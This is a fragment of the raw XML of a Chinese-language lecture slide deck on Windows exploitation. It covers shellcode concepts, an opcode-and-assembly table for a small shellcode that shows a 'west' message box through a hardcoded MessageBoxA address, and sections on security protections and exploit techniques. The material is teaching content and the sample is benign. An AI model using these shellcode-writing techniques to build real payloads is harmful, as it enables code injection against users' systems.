          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9919439" y="2762783"/>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5" name="直线箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22359760-614C-32D5-0E88-F77EF0046368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9651517" y="2923435"/>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77D0ABB-84DA-A86E-FC69-F911FEDF999F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984432" y="5563979"/>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7" name="直线箭头连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D714357C-8792-C8B5-CC80-3E17C3F15CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9670569" y="5733256"/>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33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B7ED3B-68C6-351A-89F8-A5CC27C5AC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="427311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F220484C-B8A7-DA63-48DE-71E4D5B57E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="3869836"/>
            <a:ext cx="1428891" cy="394649"/>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2B38C0E8-E66C-3438-82CE-43512818BBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="4286315"/>
            <a:ext cx="1428889" cy="377929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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74 73 65 77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连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E254C04D-96F0-983F-157D-37F5E5824617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="467287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2B8BCFB-0613-BF10-E5FD-0F3DA777177A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="4687552"/>
            <a:ext cx="1428888" cy="401043"/>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68 53 DB 33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连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6991C0A8-3DD9-62C7-AF8F-F1A142430458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="509722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34" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D176DF89-9ACE-B455-C7EF-80455AAE76DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="236394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D32D5CD2-039F-3CD3-B06B-056D42A3B059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="1985300"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="肘形连接符 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C39B91-4F81-2630-8C48-A65F5737AC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6658831" y="3546542"/>
            <a:ext cx="2376264" cy="386507"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99933"/>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连接符 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE7A8CC-89DC-96FF-EA34-1041BC0ECCCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7653709" y="2556277"/>
            <a:ext cx="409579"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pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="图片 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084628E2-A226-770D-635A-389DDD9AB7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493255" y="4016113"/>
            <a:ext cx="3646018" cy="2168165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138296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animBg="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0"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574E386-13E8-A4F6-AE62-12C00055601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可以用来在动态链接库中查找函数地址的是</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96F85295-8333-0B76-A52B-D20E6D33C33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LoadLibrary</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A8AE1D4-3A21-48E2-CF6A-D2D63D7C72BD}"/>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GetProcAddress</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B5429C68-1A8B-D072-C96F-CCAB83095A1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MessageBoxA</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818CAB3B-F29D-E5E2-9319-75AEA12778DB}"/>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MessageBox</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E62AE92-2E60-27FF-BC6A-9FE9ACB6FA75}"/>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DCA78105-E784-DD52-C426-3B85C45FE1EF}"/>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DB38762F-2A1E-D616-BC1B-4B5481802F4A}"/>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9060C17A-1337-7558-441E-FD499C7B1863}"/>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1C063DC2-FDDE-1206-E202-C433A287CC41}"/>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B483902A-90E0-6F7E-3852-DA16A10A699D}"/>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EB5F9C3-D4FB-7DD7-4056-550B5F71AF29}"/>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C985F090-CF9B-7993-0E76-E6A737B87BD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6652A108-25BF-DF53-AD3D-34DB207F6A1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4317E63C-A4E1-881E-C602-D2D97B121B65}"/>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2AC24FF8-B803-E8E8-2907-B6BBD88191DF}"/>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00700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02</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US" altLang="zh-CN" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编写</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249025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2138214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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编写是利用中非常关键的一环。在前面的示例中，直接用汇编语言编写很麻烦，需要查表来获得机器码，很容易出错。</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下面介绍一种简单的编写并提取</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的方法。</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问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BBFBF49-B878-99CF-F5E3-440CA5EA3F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2760020432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6021976" y="1987576"/>
          <a:ext cx="5794763" cy="3405238"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1402274">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592289">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">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机器</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>码</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汇编指令</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注释</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33 DB</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altLang="zh-CN" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的值设置为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>0</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53</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的值入栈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68 77 65 73 74</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74736577</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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将字符串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>west</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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68 77 65 73 74</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74736577</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a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将字符串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>west</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>入栈</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8B C4</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mov  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax,esp</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将栈顶指针存入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>（栈顶指针的值就是字符串的首地址）</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53</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类型</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50</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标题</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50</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消息</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just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>53</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" kern="10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push   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx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入栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Messagebox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的参数</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>句柄</a:t>
                      </a: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B8 EA 07 45 7E</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mov </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>, 7e4507ea</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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>MessageBoxA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>函数，每个机器的该函数的入口地址不同，请按实际值写入</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="75298" marR="75298" marT="37649" marB="3764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FF D0</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5000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>call </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="46973" marR="469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1104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287688" y="1844824"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664"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4536504"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概念及示例</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287688" y="2689475"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664"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S</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en"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hellcode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编写</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287688" y="3534126"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664"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Windows</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安全防护</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431DD1B1-9AF3-0EBA-E485-A557D7D0AB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3287688" y="4378777"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA052E4A-F873-7074-3063-08B572C01B7C}"/>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85ECFDD-4396-7AAB-873D-FD731FAFBFF0}"/>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漏洞利用技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30906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406971"/>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使用</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VC 6.0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编写程序。</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684744"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第一步：用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语言编写</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856E499F-1D20-C758-E8CD-F840908651D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="11221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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9597B8C5-1D49-C38B-7729-956A73129B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384031" y="1653494"/>
            <a:ext cx="5041203" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
